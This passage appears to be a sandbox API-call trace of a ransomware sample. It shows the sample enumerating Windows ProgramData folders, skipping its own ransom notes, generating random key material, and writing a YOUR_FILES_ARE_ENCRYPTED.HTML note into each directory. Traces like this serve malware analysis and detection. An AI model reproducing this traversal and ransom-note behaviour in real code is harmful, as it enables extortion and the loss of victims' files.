[0106.223] StrStrIW (lpFirst="print_property.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.223] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104 [0106.223] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0106.223] lstrlenW (lpString=".ico") returned 4 [0106.223] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0106.223] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0106.223] StrStrIW (lpFirst="print_queue.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.223] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101 [0106.223] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0106.223] lstrlenW (lpString=".ico") returned 4 [0106.223] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0106.223] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0106.224] StrStrIW (lpFirst="scan_.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.224] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95 [0106.224] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0106.224] lstrlenW (lpString=".ico") returned 4 [0106.224] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0106.224] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0106.224] StrStrIW (lpFirst="scan_property.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.224] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103 [0106.224] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0106.224] lstrlenW (lpString=".ico") returned 4 [0106.224] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0106.224] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21344266, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x21344266, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0106.224] StrStrIW (lpFirst="scan_settings.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.224] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103 [0106.224] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0106.224] lstrlenW (lpString=".ico") returned 4 [0106.224] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0106.224] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0106.224] StrStrIW (lpFirst="tasks.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.224] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95 [0106.224] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0106.224] lstrlenW (lpString=".xml") returned 4 [0106.224] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0106.224] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.225] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="tasks.xml", cAlternateFileName="")) returned 0 [0106.225] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.225] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.226] GetProcessHeap () returned 0x600000 [0106.226] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0106.226] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.226] WriteFile (in: hFile=0x304, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.227] CloseHandle (hObject=0x304) returned 1 [0106.228] GetProcessHeap () returned 0x600000 [0106.228] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0106.228] GetProcessHeap () returned 0x600000 [0106.228] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0106.229] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0106.229] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0106.229] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0106.229] GetProcessHeap () returned 0x600000 [0106.229] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.230] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.231] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.232] CloseHandle (hObject=0x314) returned 1 [0106.233] GetProcessHeap () returned 0x600000 [0106.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.233] GetProcessHeap () returned 0x600000 [0106.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.235] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Task", cAlternateFileName="")) returned 0 [0106.235] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.235] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0106.235] GetProcessHeap () returned 0x600000 [0106.235] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.236] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.237] CloseHandle (hObject=0x308) returned 1 [0106.238] GetProcessHeap () returned 0x600000 [0106.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.238] GetProcessHeap () returned 0x600000 [0106.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.239] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0106.239] StrStrIW (lpFirst="DeviceSync", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.239] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned 39 [0106.239] GetProcessHeap () returned 0x600000 [0106.239] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.240] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync" [0106.240] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*" [0106.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0106.240] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.241] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 0 [0106.241] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0106.241] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0106.241] GetProcessHeap () returned 0x600000 [0106.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\devicesync\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.242] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.243] CloseHandle (hObject=0x308) returned 1 [0106.243] GetProcessHeap () returned 0x600000 [0106.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.243] GetProcessHeap () returned 0x600000 [0106.244] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.245] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Diagnosis", cAlternateFileName="DIAGNO~1")) returned 1 [0106.245] StrStrIW (lpFirst="Diagnosis", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.245] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis") returned 38 [0106.245] GetProcessHeap () returned 0x600000 [0106.245] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.246] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis" [0106.246] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\*" [0106.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0106.246] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="AsimovUploader", cAlternateFileName="ASIMOV~1")) returned 1 [0106.246] StrStrIW (lpFirst="AsimovUploader", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.246] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader") returned 53 [0106.246] GetProcessHeap () returned 0x600000 [0106.246] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.249] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader" [0106.249] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\*" [0106.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.249] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 0 [0106.249] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.250] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0106.250] GetProcessHeap () returned 0x600000 [0106.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\asimovuploader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.251] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.252] CloseHandle (hObject=0x314) returned 1 [0106.253] GetProcessHeap () returned 0x600000 [0106.253] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.253] GetProcessHeap () returned 0x600000 [0106.253] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.254] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="DownloadedScenarios", cAlternateFileName="DOWNLO~1")) returned 1 [0106.254] StrStrIW (lpFirst="DownloadedScenarios", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.254] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios") returned 58 [0106.254] GetProcessHeap () returned 0x600000 [0106.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.256] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios" [0106.256] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\*") 